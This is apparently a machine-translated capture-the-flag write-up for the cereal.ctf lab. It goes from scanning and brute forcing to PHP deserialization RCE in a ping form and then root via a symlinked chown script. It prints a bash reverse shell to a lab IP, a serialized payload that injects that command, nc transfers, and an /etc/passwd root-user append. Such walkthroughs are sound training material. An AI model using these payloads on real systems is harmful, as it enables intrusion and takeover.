Catalog

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection

Four 、 Port analysis

1.21 ftp

2.22 80

3.139 445 3306

4. Other ports

5、 ... and 、 information gathering

  6、 ... and 、 Catalog explosion

7、 ... and 、 Bind domain name

8、 ... and 、gobuster Subdomain explosion

Nine 、secure.cereal.ctf

Ten 、 breakthrough

1. function

2. Command injection

3. Packet capture decoding

4.dirbuster Blasting backup file

  11、 ... and 、 Download backup files and audit

Twelve 、 structure payload

13、 ... and 、 Try to inject

1. normal ping command

 2. Caused by deserialization rce

 3. rebound shell

fourteen 、pspy Capture timed progress —— Raise the right

One 、 The host found

Two 、 Port scanning

3、 ... and 、 Service version detection

Four 、 Port analysis

1.21 ftp

21 The port is open ftp service , This is also ftp Default port , We can know ftp The server ip, I also know that I can log in anonymously

2.22 80

Open common services ssh and http service

3.139 445 3306

139 445 Generally deployed smb service , Just based on different protocols .

3306 mysql Common data ports . Allow connection is shown here .

4. Other ports

As for other ports , except 44441 Opened a http service , There is not much valid information left , The service didn't come out

5、 ... and 、 information gathering

1.80

The main page didn't harvest

Source code ： Interface , Hide directory , The leaked source code was not found . No gain

2.44441

There is nothing more

  6、 ... and 、 Catalog explosion

1.80

（1） Default dictionary

Direct scanning ,dir The default with common.txt run , Scan out these directories

  You can have one wordpress（ Judgment through other links ） Background login interface , Trying a weak password is invalid

（2）/blog

There is a domain name information ,backup Backup ,

 （3）phpinfo

You can learn some interface information , Profile information , Server language running environment （php）

2.44441

There is no valid information here .

3. Change a big dictionary and run

There is no more information

7、 ... and 、 Bind domain name

visit , It turned out to be a Apache The default page for . Try to explode the directory under this domain name , According to the prompt , Find a backup file , As a result, pull pull pull , Or nothing .

1.80

2.44441

8、 ... and 、gobuster Subdomain explosion

gobuster vhost -u http://cereal.ctf:44441 -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt

A subdomain name is found here

Nine 、secure.cereal.ctf

  take ip and host Access after binding the file ,80 It's the same as the main interface

44441 Such a thing is deployed at the bottom of the port

Ten 、 breakthrough

1. function

This is an execution ping Interface of operation . And it calls the operating system ping command

2. Command injection

| && ; Try with these

The attempt failed

3. Packet capture decoding

Obviously , This is a php Serialized data , How to use this deserialization , How to determine whether there is a deserialization vulnerability . We can only determine whether there is a deserialization vulnerability through code audit , To construct the payload.

4.dirbuster Blasting backup file

（1） The backup file may have a filename

.svn .git

The attempt failed

（2） Backup directory burst

As a result, there is one back_en route , This is the backup file path

 （3） Backup file

choose seclists Under the conmon.txt To blow up ,200 Normal state

  11、 ... and 、 Download backup files and audit

1.index.php.bak file

This is the back-end code

Twelve 、 structure payload

Find one. php Online website to implement

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);

?>

13、 ... and 、 Try to inject

1. normal ping command

 2. Caused by deserialization rce

You can see in the source code section id Command execution succeeded

 3. rebound shell

bash -i >& /dev/tcp/192.168.0.106/5555 0>&1

<?php
    class pingTest {
        public $ipAddress = "192.168.0.106;bash -i >& /dev/tcp/192.168.0.106/5555 0>&1 ";
        public $isValid = True;
}
$obj = NEW pingTest;
$serilaze= serialize($obj);
echo urlencode($serilaze);

?>

Break through the border , Rebound success ：

fourteen 、pspy Capture timed progress —— Raise the right

summary ： In the previous study , We have learned a lot about the means of raising rights , Kernel vulnerability ,suid Authority inheritance ,sudo Configuration of permissions ,motd Inject , out of buffer , utilize redis unauthorized , use mysql Write the public key , None of these means can claim power here .

1.pspy Process monitoring software

sketch ： This software can be used by ordinary users , Can monitor root Generated process . See if there is a process that can be used to raise rights .

Because the goal is 64 Bit , We also download one 64 Bit .

2. adopt nc transmission

nc -nvlp 4444 > pspy

nc 192.168.0.104 4444 < pspy64 -w 1

3. perform pspy

The first step is to give permission , After execution

I'll take it , There is everything , It has to be said that this is an artifact of system troubleshooting .

4.chown.py

We found an exception file , Try to analyze it

5. Permission to analysis

The main genera and groups are all root, And we can also read .

6. see shell Source code

It is mainly to change the owner and group of all files in the following folder to rocky:apache, Then we can change it by linking /etc/passwd Genus group and owner of , We are currently apache group .

7. Modify master and group through soft connection

ln Parameters -f：

-f prompt ln
Command replaces any existing destination path . If the destination path already exists , There is no designation -f
sign ,ln
The command does not create a new link , Instead, write a diagnostic message to the standard error and continue linking the rest
SourceFiles.

8. Ten minutes long wait

You can see that the file has been changed

9. Additional root user

echo "mhq::0:0:root:/root:/bin/bash" >> /etc/passwd

Mention right to success